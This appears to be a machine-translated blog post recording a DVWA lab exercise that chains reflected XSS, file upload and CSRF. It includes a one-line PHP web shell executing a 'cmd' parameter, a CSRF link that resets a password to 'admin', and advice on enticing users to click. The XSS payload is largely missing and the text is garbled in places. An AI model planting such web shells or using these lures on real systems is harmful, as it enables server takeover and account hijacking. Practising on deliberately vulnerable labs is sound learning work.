In the process of learning, think of several loopholes in the combination of exercises to record the learning process. Big guy, please go around! Thank you!!
Test environment: DVWA, installation Method Reference previous article: https://www.cnblogs.com/aq-ry/p/9220584.html
Prior knowledge: Understand the Reflection type XSS, file upload, CSRF vulnerability principle and utilization method.
first, reflective type XSS;
View Source files: www\dvwa\vulnerabilities\xss_r\source\low.php
No filtering, constructs the following HTML code, respectively, two pictures, to entice users to click, to form an XSS attack:
<! DOCTYPE html>
<! DOCTYPE html>
First jump to file Upload vulnerability:
Second jump to CSRF vulnerability:
two , file upload:
View Source: www\dvwa\vulnerabilities\upload\source\low.php
Phpinfo sentence: <?php phpinfo ();? >
shell.php a word Trojan: <?php echo shell_exec ($_get[' cmd ');? >
or upload a word trojan, with Chinese kitchen knife to connect.
Third, CSRF :
View Source: www\dvwa\vulnerabilities\csrf\source\low.php
http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change#
Convince the user to click this link to modify the user's password:
If there is any mistake, please point out the Big Brother! This article belongs to their original, reproduced please indicate the source, thank you!
Reflection type xss+ File Upload +csrf-dvwa